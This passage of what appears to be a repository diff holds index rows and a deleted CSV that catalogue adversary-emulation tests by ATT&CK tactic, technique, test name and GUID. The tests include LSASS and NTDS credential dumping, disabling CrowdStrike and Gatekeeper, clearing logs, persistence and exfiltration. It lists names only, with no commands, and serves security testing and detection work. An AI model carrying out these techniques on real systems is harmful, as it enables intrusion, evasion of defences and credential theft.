33 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
34 privilege-escalation T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
35 privilege-escalation T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
36 privilege-escalation T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
37 privilege-escalation T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
38 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
39 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
40 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
41 privilege-escalation T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
42 privilege-escalation T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
43 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
44 defense-evasion T1070.003 Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
45 defense-evasion T1070.003 Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
46 defense-evasion T1070.003 Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
47 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
48 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
49 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
50 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
51 defense-evasion T1562.001 Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
52 defense-evasion T1562.001 Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
53 defense-evasion T1562.001 Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
54 defense-evasion T1562.001 Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
55 defense-evasion T1562.001 Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
56 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
57 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
58 defense-evasion T1553.001 Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
59 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
60 defense-evasion T1564.001 Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
61 defense-evasion T1564.001 Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
62 defense-evasion T1564.001 Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
63 defense-evasion T1564.001 Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
64 defense-evasion T1564.002 Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
65 defense-evasion T1564.002 Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
66 defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
67 defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
68 defense-evasion T1553.004 Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
69 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
70 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
71 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
72 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
73 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
74 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
75 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
76 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
77 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
78 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
79 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
80 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
81 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
82 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
83 defense-evasion T1027.002 Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
84 defense-evasion T1027.002 Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
85 defense-evasion T1036.006 Space after Filename 1 Space After Filename 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
86 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
87 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
88 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
89 defense-evasion T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
90 defense-evasion T1070.006 Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
91 defense-evasion T1070.006 Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
92 defense-evasion T1070.006 Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
93 defense-evasion T1070.006 Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
94 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
95 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
96 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
97 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
98 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
99 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
100 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
101 discovery T1083 File and Directory Discovery 3 Nix File and Diectory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
102 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
103 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
104 discovery T1087.001 Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
105 discovery T1087.001 Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
106 discovery T1087.001 Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
107 discovery T1087.001 Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
108 discovery T1069.001 Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
109 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 sh
110 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
111 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
112 discovery T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
113 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
114 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
115 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
116 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
117 discovery T1518.001 Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
118 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
119 discovery T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
120 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
121 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
122 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
123 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
124 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
125 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
126 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
127 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
128 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
129 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
130 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
131 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
132 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
133 persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
134 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
135 persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
136 persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
137 persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
138 persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
139 persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
140 persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
141 persistence T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
142 persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
143 persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
144 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
145 persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
146 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
147 persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
148 persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
149 execution T1059.002 AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
150 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
151 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
152 execution T1569.001 Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
153 execution T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
154 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
155 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
156 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
157 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
158 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
159 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
160 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
161 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
162 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
163 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
164 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
165 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
166 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
167 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
168 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
169 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
170 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
171 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
atomics/Indexes/Indexes-CSV/windows-index.csv
-618
View File
@@ -1,618 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
